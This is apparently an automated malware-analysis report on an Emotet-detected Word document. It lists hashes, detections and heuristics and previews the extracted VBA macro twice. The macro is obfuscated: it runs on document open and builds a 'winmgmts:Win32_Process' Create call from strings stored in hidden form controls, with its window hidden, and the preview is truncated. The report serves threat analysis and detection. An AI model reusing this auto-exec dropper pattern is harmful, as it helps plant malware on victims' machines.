Emotet Office (OLE) malware analysis — malicious · 256d5dfbfdd4ac0a

MALICIOUS

Office (OLE)

130.9 KB Created: 2019-05-28 07:08:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 5393964e1f9e36bf08021fad41e01b53 SHA-1: 1fee39fed51fd224f86ad02e0bdcefbf470b2229 SHA-256: 256d5dfbfdd4ac0ac2b0cd445f30c790ab951f52365e6ff28156bfb238235ab7

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-10001946-0', strongly suggesting the Emotet family. Heuristics indicate the presence of an AutoOpen VBA macro that utilizes CreateObject, a common technique for downloading and executing secondary payloads. No specific download URL or execution command was directly extracted, but the overall behavior points to a downloader.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5039 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5039 bytes
SHA-256: `7380e6ff79b2e3f94e97eec6f704d92a235e589c48692cb2053ec16805f8730a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "rn51tfI, 0, 0, MSForms, ComboBox" Attribute VB_Control = "n00dj7, 1, 1, MSForms, ComboBox" Attribute VB_Control = "tALCDFW, 2, 2, MSForms, ComboBox" Sub _ autoopen( _ ) Debug.Print "DNRSQrh" + ("qnU1I8") + "Y9973miC" + "jXJXFjM" + "wNT28EGT" + ("DZjsdj" + ("WMlzPvP3")) Debug.Print "WhwnPKhl" + ("A3wSZz") + "Gprznk" + "JJ0ilFmH" + ("WbJYL3Z" + "dbTYcUMu") jb3mD6 Debug.Print "iqSGnGY" + ("V1JMJaT") + "inap3i_N" + "FUjWDAm5" + "IIYuY5" + ("S85_rm4k" + ("pzHZriAQ")) Debug.Print "FLhhBAh" + ("jQ9hP3") + "Fo5iiw" + "YLvc6t" + ("ZoKZX0qF" + "bp2S3iN") End Sub Attribute VB_Name = "buImUJ" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "EBJqFb3N" Attribute VB_Name = "zfZDRIE_" Attribute VB_Name = "Aaf02TQd" Attribute VB_Name = "VA5PmZ" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "KNBt8zfD" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "NzadOpO" Function jb3mD6() sUZBjj4 = ThisDocument.n00dj7 + ThisDocument.tALCDFW + ThisDocument.rn51tfI Debug.Print "aKj50Q" + ("tMB_5i") + "mmpWrdC" + "E3lczo1P" + "aNtwkJU" + ("LdQEitVQ" + ("RDIcM5Z")) Debug.Print "EjLuj9R" + ("rEMXhO") + "qzCucY" + "AhXwh3Lu" + ("MCtsGRdU" + "H0j5h8E") FoE1wmh = "win" Debug.Print "L5GjaaQ" + ("QFud7q") + "AYTTjaDs" + "dJ2owUt" + "ooQ0s7" + ("flW00z" + ("LQMsiCzO")) Debug.Print "mUqUauEY" + ("nalXONc") + "fkX4tiDh" + "l1BIAL9j" + ("j5l6nK" + "qdQlsZO") nDVvoKb4 = FoE1wmh + "mgmts:Win32_Process" Debug.Print "VC0jQC" + ("FXtXvJp") + "m9sIGNVE" + "kXaZu6VJ" + "us_vuVKV" + ("VzlZwLM" + ("robwET")) Debug.Print "w0da_LU6" + ("wYwD_zEj") + "AnjsS2oL" + "vbupMXzA" + ("NfuNQoh" + "fsfZNpV") H9CmrEoJ(nDVvoKb4).Create# sUZBjj4, HiJcFC, jY2bi1wA, F2mCDIU Debug.Print "ZQKqq57" + ("iC8z3a") + "WcXjbzhS" + "wXhifz" + "J6pz7vF" + ("ijVPkw" + ("V54DdnY1")) Debug.Print "HvGiIf" + ("zBohma") + "zwfEWmK" + "vamtRQ" + ("m9kJCY1" + "oUF4Sd8") End Function Attribute VB_Name = "RfohkVc" Function jY2bi1wA() Debug.Print "wuGGCT" + ("aiUN7k") + "OQiN9OM1" + "TcuRIUlm" + "wdWZo0" + ("WAt5c8" + ("nXLshQp")) Debug.Print "QSOa_nTE" + ("q5Fk_TLZ") + "Z_z1tj" + "pjswSdU" + ("fbXa1XLn" + "pMYW3Ozc") FoE1wmh = "win" Debug.Print "wn3UNdJ" + ("GVq8ES") + "YlT25Wob" + "YNTQFai" + "kh5JvcRv" + ("zGrs6a" + ("jEQN4S")) Debug.Print "T93PQdEY" + ("dciYnm") + "wRzfY2f" + "woiomEFE" + ("I1iCSUq2" + "Pcp_hTz") nDVvoKb4 = FoE1wmh + "mgmts:Win32_Process" + "Startup" Debug.Print "BaaMpwbi" + ("MGk3pr") + "wzoGjZi" + "dGiqzj" + "zZmOw0lO" + ("ujERUJOc" + ("v2AsTt")) Debug.Print "JbalrBp" + ("FKzD46") + "p0SzVcW" + "vIY67CG" + ("KhS3Cm" + "GSFKC8") Set jY2bi1wA = H9CmrEoJ(nDVvoKb4) Debug.Print "rkpAdhOU" + ("n1LMmid") + "BknUY6" + "i9NB1f" + "jjc1TrzD" + ("RMIlvJ" + ("nUMPRFV")) Debug.Print "S3T7Uja" + ("BKwVwkuN") + "CEMDPTuS" + "OWf9IaM" + ("Aotm1I" + "WhnfEjZT") With jY2bi1wA Debug.Print "o4bCRj" + ("WzjKjHAQ") + "vbdLcq" + "ft1H60" + "YfzkJ3B" + ("iYwoCOwz" + ("cjlbva")) Debug.Print "H5T6kj8o" + ("mBDaLbw") + "YjiDUIzF" + "DBK084Xc" + ("NrYuSCvI" + "IncjsWp") . _ ShowWindow = pa4wacjC + p0Df ... (truncated)

SHA-256: 7380e6ff79b2e3f94e97eec6f704d92a235e589c48692cb2053ec16805f8730a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "rn51tfI, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "n00dj7, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "tALCDFW, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
   Debug.Print "DNRSQrh" + ("qnU1I8") + "Y9973miC" + "jXJXFjM" + "wNT28EGT" + ("DZjsdj" + ("WMlzPvP3"))
Debug.Print "WhwnPKhl" + ("A3wSZz") + "Gprznk" + "JJ0ilFmH" + ("WbJYL3Z" + "dbTYcUMu")
jb3mD6
   Debug.Print "iqSGnGY" + ("V1JMJaT") + "inap3i_N" + "FUjWDAm5" + "IIYuY5" + ("S85_rm4k" + ("pzHZriAQ"))
Debug.Print "FLhhBAh" + ("jQ9hP3") + "Fo5iiw" + "YLvc6t" + ("ZoKZX0qF" + "bp2S3iN")
End Sub


Attribute VB_Name = "buImUJ"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "EBJqFb3N"

Attribute VB_Name = "zfZDRIE_"

Attribute VB_Name = "Aaf02TQd"

Attribute VB_Name = "VA5PmZ"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "KNBt8zfD"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "NzadOpO"
Function jb3mD6()
sUZBjj4 = ThisDocument.n00dj7 + ThisDocument.tALCDFW + ThisDocument.rn51tfI
   Debug.Print "aKj50Q" + ("tMB_5i") + "mmpWrdC" + "E3lczo1P" + "aNtwkJU" + ("LdQEitVQ" + ("RDIcM5Z"))
Debug.Print "EjLuj9R" + ("rEMXhO") + "qzCucY" + "AhXwh3Lu" + ("MCtsGRdU" + "H0j5h8E")
FoE1wmh = "win"
   Debug.Print "L5GjaaQ" + ("QFud7q") + "AYTTjaDs" + "dJ2owUt" + "ooQ0s7" + ("flW00z" + ("LQMsiCzO"))
Debug.Print "mUqUauEY" + ("nalXONc") + "fkX4tiDh" + "l1BIAL9j" + ("j5l6nK" + "qdQlsZO")
nDVvoKb4 = FoE1wmh + "mgmts:Win32_Process"
   Debug.Print "VC0jQC" + ("FXtXvJp") + "m9sIGNVE" + "kXaZu6VJ" + "us_vuVKV" + ("VzlZwLM" + ("robwET"))
Debug.Print "w0da_LU6" + ("wYwD_zEj") + "AnjsS2oL" + "vbupMXzA" + ("NfuNQoh" + "fsfZNpV")
H9CmrEoJ(nDVvoKb4).Create# sUZBjj4, HiJcFC, jY2bi1wA, F2mCDIU
   Debug.Print "ZQKqq57" + ("iC8z3a") + "WcXjbzhS" + "wXhifz" + "J6pz7vF" + ("ijVPkw" + ("V54DdnY1"))
Debug.Print "HvGiIf" + ("zBohma") + "zwfEWmK" + "vamtRQ" + ("m9kJCY1" + "oUF4Sd8")
End Function

Attribute VB_Name = "RfohkVc"
Function jY2bi1wA()
   Debug.Print "wuGGCT" + ("aiUN7k") + "OQiN9OM1" + "TcuRIUlm" + "wdWZo0" + ("WAt5c8" + ("nXLshQp"))
Debug.Print "QSOa_nTE" + ("q5Fk_TLZ") + "Z_z1tj" + "pjswSdU" + ("fbXa1XLn" + "pMYW3Ozc")
FoE1wmh = "win"
   Debug.Print "wn3UNdJ" + ("GVq8ES") + "YlT25Wob" + "YNTQFai" + "kh5JvcRv" + ("zGrs6a" + ("jEQN4S"))
Debug.Print "T93PQdEY" + ("dciYnm") + "wRzfY2f" + "woiomEFE" + ("I1iCSUq2" + "Pcp_hTz")
nDVvoKb4 = FoE1wmh + "mgmts:Win32_Process" + "Startup"
   Debug.Print "BaaMpwbi" + ("MGk3pr") + "wzoGjZi" + "dGiqzj" + "zZmOw0lO" + ("ujERUJOc" + ("v2AsTt"))
Debug.Print "JbalrBp" + ("FKzD46") + "p0SzVcW" + "vIY67CG" + ("KhS3Cm" + "GSFKC8")
Set jY2bi1wA = H9CmrEoJ(nDVvoKb4)
   Debug.Print "rkpAdhOU" + ("n1LMmid") + "BknUY6" + "i9NB1f" + "jjc1TrzD" + ("RMIlvJ" + ("nUMPRFV"))
Debug.Print "S3T7Uja" + ("BKwVwkuN") + "CEMDPTuS" + "OWf9IaM" + ("Aotm1I" + "WhnfEjZT")
With jY2bi1wA
   Debug.Print "o4bCRj" + ("WzjKjHAQ") + "vbdLcq" + "ft1H60" + "YfzkJ3B" + ("iYwoCOwz" + ("cjlbva"))
Debug.Print "H5T6kj8o" + ("mBDaLbw") + "YjiDUIzF" + "DBK084Xc" + ("NrYuSCvI" + "IncjsWp")
. _
ShowWindow = pa4wacjC + p0Df
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.